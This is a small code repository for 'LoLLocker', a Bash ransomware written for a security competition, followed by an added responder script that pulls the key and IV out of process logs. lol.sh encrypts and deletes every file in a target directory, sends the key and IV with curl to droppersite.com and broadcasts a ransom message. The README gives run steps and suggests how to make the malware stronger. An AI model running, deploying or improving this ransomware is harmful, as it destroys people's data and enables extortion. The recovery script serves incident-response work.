├── dec.sh
├── lol.sh
└── README.md


/dec.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | 
3 | if [ $# -ne 3 ]
4 | then
5 |     echo "Usage: ./dec.sh [pass] [iv] [dirwalk]"
6 | else
7 |     pass=$1
8 |     iv=$2
9 |     dirwalk=$3
10 |     files=`find "$dirwalk" -iname "*.lol"`
11 |     for f in $files
12 |     do
13 |         # Strip only the trailing .lol extension (any case, to match -iname)
14 |         outfile="${f%.[lL][oO][lL]}"
15 |         echo "Decrypting ${f}, outfile is ${outfile}"
16 |         openssl enc -d -aes-256-cbc -a -in "$f" -iv "$iv" -pass "pass:$pass" -out "$outfile"
17 |         # Remove the encrypted copy only if decryption succeeded
18 |         if [ $? -eq 0 ]
19 |         then
20 |             rm "$f"
21 |         fi
22 |     done
23 | fi
24 | 


--------------------------------------------------------------------------------
/lol.sh:
--------------------------------------------------------------------------------
1 | if [ $# -ne 2 ]
2 | then
3 |     echo "Usage: ./lol.sh [pw] [dir1]"
4 | else
5 |     iv=`cat /dev/urandom | tr -cd 'A-F0-9' | head -c 32`
6 |     pass=$1
7 |     dirwalk=$2
8 |     white_list=( cat wall echo bash ifconfig ls chmod rm openssl )
9 |     re="$(printf '%s\n' "${white_list[@]}" | paste -sd '|')"
10 |     files=`find $dirwalk -type f`
11 |     curl --data "key=$pass&iv=$iv&msg=msg" https://droppersite.com
12 |     for f in $files
13 |     do
14 |         if [[ ! $f =~ $re ]]; then
15 |             outfile=$f.lol
16 |             `openssl enc -aes-256-cbc -a -salt -in $f -out $outfile -pass pass:$pass -iv $iv`
17 |             rm $f
18 |         fi
19 |     done
20 |     echo "Yo! You've been infected by LOLLOCKER. Come schmooze redteam for the password! ;) ;)" | wall
21 | fi
22 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | LoLLocker
2 | ===
3 | 
4 | Bash-based cryptolocker
5 | 
6 | I wrote this in a hack/prep night for the [information security talent search](http://ists.sparsa.org/) (ISTS) @ Rochester Institute of Technology.
7 | 
8 | Please improve/learn from this, it's academic code and in no way do I endorse using this for evil.
9 | 
10 | Run
11 | ===
12 | 
13 | Change URL on line 11 from https://droppersite.com to your server.
14 | 
15 | Things to note:
16 | 
17 | I have a white_list to make sure you don't encrypt everything; it encrypts everything in the target directory. You can instead substitute this for a file extension list and only encrypt those extensions and filter through sed.
18 | 
19 | Encrypt
20 | ==
21 | 
22 | ```./lol.sh password targetdir```
23 | 
24 | Decrypt
25 | ==
26 | 
27 | ```./dec.sh password iv targetdir```
28 | 
29 | Things it doesn't do
30 | ===
31 | 
32 | Ideally, port a pub key to encrypt the symmetric key:IV to send that as one parameter when you encrypt everything.
33 | 
34 | Also, separate IV per file, and better encrypted file detection (magic values prepended/appended instead of an extension is ideal)
35 | 
36 | 
--------------------------------------------------------------------------------
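
lol.sh puts the password and IV on the command line twice: in the `curl --data` call on line 11 and in every `openssl enc` call on line 16. Any process-execution telemetry collected on the host therefore records both values. The function below is an added example, not part of the original repository; it pulls them out of such records so a responder can pass them to dec.sh. The `time pid=N cmd=...` log layout and all sample values are constructed.

```shell
#!/bin/sh
# Added example (not from the LoLLocker repo): recover the password and IV
# from process-execution records. The record layout and every value in the
# sample are constructed; adapt the field handling to what your EDR or
# audit pipeline actually emits.

sample_exec_log() {
cat <<'EOF'
2024-03-02T01:14:07Z pid=4120 cmd=bash ./lol.sh CONSTRUCTED_PW /srv/share
2024-03-02T01:14:07Z pid=4125 cmd=curl --data key=CONSTRUCTED_PW&iv=0123456789ABCDEF0123456789ABCDEF&msg=msg https://droppersite.com
2024-03-02T01:14:08Z pid=4131 cmd=openssl enc -aes-256-cbc -a -salt -in /srv/share/a.txt -out /srv/share/a.txt.lol -pass pass:CONSTRUCTED_PW -iv 0123456789ABCDEF0123456789ABCDEF
2024-03-02T01:14:08Z pid=4133 cmd=openssl enc -aes-256-cbc -a -salt -in /srv/share/b.csv -out /srv/share/b.csv.lol -pass pass:CONSTRUCTED_PW -iv 0123456789ABCDEF0123456789ABCDEF
2024-03-02T01:20:00Z pid=4200 cmd=openssl x509 -in /etc/ssl/cert.pem -noout -dates
EOF
}

# Reads exec records on stdin and prints one "password iv" line per distinct
# pair seen in an `openssl enc` encryption call. Decrypt calls (-d) and
# unrelated openssl subcommands are skipped. Assumes the password contains
# no whitespace, which lol.sh's unquoted $pass already requires.
recover_key_material() {
  awk '
    /cmd=openssl enc / {
      pass = ""; iv = ""; decrypt = 0
      for (i = 1; i <= NF; i++) {
        if ($i == "-d") decrypt = 1
        if ($i == "-pass" && $(i + 1) ~ /^pass:/) pass = substr($(i + 1), 6)
        if ($i == "-iv") iv = $(i + 1)
      }
      # Accept only a 32-hex-digit IV, the shape lol.sh generates.
      if (!decrypt && pass != "" && length(iv) == 32 && iv ~ /^[0-9A-Fa-f]+$/) {
        key = pass " " iv
        if (!(key in seen)) { seen[key] = 1; print key }
      }
    }'
}

# Demo run over the constructed sample.
sample_exec_log | recover_key_material
```

Each output line supplies the first two arguments of `./dec.sh password iv targetdir`.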